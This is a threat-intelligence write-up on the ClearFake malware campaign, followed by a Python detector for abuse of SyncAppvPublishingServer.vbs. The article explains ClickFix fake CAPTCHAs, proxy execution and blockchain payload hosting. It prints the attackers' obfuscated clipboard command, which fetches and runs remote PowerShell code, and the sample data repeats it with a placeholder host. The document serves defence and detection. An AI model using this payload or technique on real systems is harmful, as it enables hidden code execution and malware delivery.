ClearFake Malware Abuses Trusted Windows Script to Execute Hidden PowerShell Commands

A sophisticated evolution of the ClearFake malware campaign is abusing a legitimate Windows component to execute malicious PowerShell commands while evading endpoint detection systems.

The campaign, which has compromised hundreds of websites since August 2025, now leverages a command injection vulnerability in a trusted Microsoft-signed script to silently run malicious code. Transaction logs from the operation's blockchain infrastructure indicate approximately 150,000 infections to date.

ClickFix Social Engineering

ClearFake operates as a traffic distribution system, compromising legitimate websites and injecting malicious JavaScript. Visitors encounter fake CAPTCHA challenges using the ClickFix technique—instructing users to press Win+R to open the Run dialog, Ctrl+V to paste a command, then Enter to execute.

The malicious PowerShell command is silently copied to the victim's clipboard without their knowledge. The operators sell access to other threat actors who distribute their own payloads through the infected network, explaining the variety of malware families delivered via the campaign.

Proxy Execution via Trusted Component

The most significant evolution is ClearFake's adoption of proxy execution to evade EDR solutions. Rather than directly calling powershell.exe or mshta.exe—which trigger security alerts—the malware now abuses SyncAppvPublishingServer.vbs, a legitimate Windows system file located in C:\Windows\System32.

The script, designed for synchronizing App-V environments, contains a command injection vulnerability. It builds PowerShell commands by concatenating user-provided arguments, and because PowerShell statements are separated by semicolons, attackers can inject arbitrary code after a fake server name.

The malicious clipboard payload:

SyncAppvPublishingServer.vbs "n;&(gal i*x)(&(gcm *stM*) 'cdn.jsdelivr[.]net/gh/clock-cheking/expert-barnacle/load')"

Because SyncAppvPublishingServer.vbs is digitally signed by Microsoft and launches PowerShell in hidden mode (-WindowStyle Hidden), the malicious activity is invisible to users. Security products are unlikely to block this behavior without breaking legitimate functionality.

Command Obfuscation

The PowerShell commands employ additional evasion techniques using aliases and wildcard patterns instead of easily detected command names. &(gal i*x) retrieves the alias for Invoke-Expression, while &(gcm *stM*) matches Invoke-RestMethod—bypassing signature-based detection rules.

Blockchain C2 Infrastructure

ClearFake employs a technique known as EtherHiding, hosting payloads in smart contracts on the BNB Smart Chain testnet. The multi-stage JavaScript infection chain retrieves data from smart contract address 0xA1decFB75C8C0CA28C10517ce56B710baf727d2e.

This provides takedown-resistant infrastructure since blockchain data is immutable and publicly accessible. Only the wallet owner can modify contract contents, while anyone can retrieve the hosted malicious code. The campaign tracks infections by assigning each compromised system a unique identifier uploaded to a separate tracking contract.

Mitigations

Organizations should consider:

  • Blocking RPC endpoints used for blockchain communication (bsc-testnet.drpc.org, data-seed-prebsc-1-s1.bnbchain.org) if Web3 technologies aren't required
  • Restricting or monitoring SyncAppvPublishingServer.vbs execution
  • Inspecting command lines for semicolons in arguments passed to the script
  • Implementing user education about fake CAPTCHA prompts requesting Run dialog or paste actions—no legitimate verification requires these steps
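The last two mitigations, together with the alias and wildcard patterns described under Command Obfuscation, can be checked in one pass over process-creation telemetry. The block below is an added example, not code from the article or from any vendor: the sample records are constructed (no real telemetry), the download domain is a placeholder standing in for the real one, and both the benign baseline record and the explorer.exe-parent heuristic are assumptions to be tuned against an environment's own data.

```python
"""Flag SyncAppvPublishingServer.vbs proxy execution in process-creation records.

Added example for the ClearFake write-up; not code from the article. Sample records
below are constructed, and the download domain is a placeholder.
"""
import re
from typing import Dict, List, Optional

# Constructed sample process-creation records (not real telemetry). Field names mirror
# what a Sysmon Event ID 1 / Security 4688 pipeline is commonly normalised to.
SAMPLE_EVENTS: List[dict] = [
    {  # ClickFix-style invocation: injected statement after the fake server name "n"
        "id": 1,
        "image": r"C:\Windows\System32\wscript.exe",
        "parent_image": r"C:\Windows\explorer.exe",
        "command_line": r'''wscript.exe C:\Windows\System32\SyncAppvPublishingServer.vbs "n;&(gal i*x)(&(gcm *stM*) 'https://placeholder.invalid/load')"''',
    },
    {  # Assumed benign baseline: a scheduled sync with a plain argument (constructed)
        "id": 2,
        "image": r"C:\Windows\System32\wscript.exe",
        "parent_image": r"C:\Windows\System32\svchost.exe",
        "command_line": r'wscript.exe C:\Windows\System32\SyncAppvPublishingServer.vbs "1"',
    },
    {  # Unrelated process: never inspected
        "id": 3,
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent_image": r"C:\Windows\explorer.exe",
        "command_line": "powershell.exe -Command Get-Date",
    },
    {  # Injection without the alias/wildcard tricks: still a semicolon in the argument
        "id": 4,
        "image": r"C:\Windows\System32\wscript.exe",
        "parent_image": r"C:\Windows\explorer.exe",
        "command_line": r'wscript.exe C:\Windows\System32\SyncAppvPublishingServer.vbs "n;Get-Date"',
    },
]

SCRIPT_RE = re.compile(r"syncappvpublishingserver\.vbs", re.IGNORECASE)

# Alias/wildcard obfuscation from the article: the call operator applied to a
# Get-Alias (gal) or Get-Command (gcm) lookup whose argument contains a wildcard,
# which resolves Invoke-Expression / Invoke-RestMethod without naming them.
OBFUSCATION_RES: Dict[str, re.Pattern] = {
    "alias-wildcard-invoke": re.compile(r"&\s*\(\s*(?:gal|get-alias)\s+[^)]*\*", re.IGNORECASE),
    "command-wildcard-lookup": re.compile(r"&\s*\(\s*(?:gcm|get-command)\s+[^)]*\*", re.IGNORECASE),
}


def script_arguments(command_line: str) -> Optional[str]:
    """Return the text passed to SyncAppvPublishingServer.vbs, or None when the
    command line does not invoke it. One pair of surrounding double quotes is removed."""
    match = SCRIPT_RE.search(command_line)
    if match is None:
        return None
    args = command_line[match.end():].strip()
    if len(args) >= 2 and args[0] == '"' and args[-1] == '"':
        args = args[1:-1]
    return args


def analyse_event(event: dict) -> List[str]:
    """Return detection reasons for one record; an empty list means nothing fired."""
    args = script_arguments(event["command_line"])
    if args is None:
        return []
    reasons: List[str] = []
    # The article's mitigation: a semicolon in the argument starts a second
    # PowerShell statement once the script concatenates it into its command.
    if ";" in args:
        reasons.append("semicolon-in-arguments")
    for name, pattern in OBFUSCATION_RES.items():
        if pattern.search(args):
            reasons.append(name)
    # Assumption: the Run dialog used by ClickFix spawns children under explorer.exe,
    # whereas a scheduled App-V sync would not. Treat this as context, not proof.
    if event.get("parent_image", "").lower().endswith("explorer.exe"):
        reasons.append("launched-from-explorer")
    return reasons


def scan(events: List[dict]) -> Dict[int, List[str]]:
    """Map event id -> reasons for every record that produced at least one reason."""
    findings: Dict[int, List[str]] = {}
    for event in events:
        reasons = analyse_event(event)
        if reasons:
            findings[event["id"]] = reasons
    return findings


if __name__ == "__main__":
    for event_id, reasons in scan(SAMPLE_EVENTS).items():
        print(f"event {event_id}: {', '.join(reasons)}")
```

Reasons are returned as a list rather than printed so a pipeline can map them to severity: a semicolon alone is the article's primary signal, and the alias/wildcard matches on top of it raise confidence. The semicolon heuristic follows the article's suggestion and should be validated against whatever legitimate App-V sync invocations exist in the environment before it is turned into a blocking rule.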
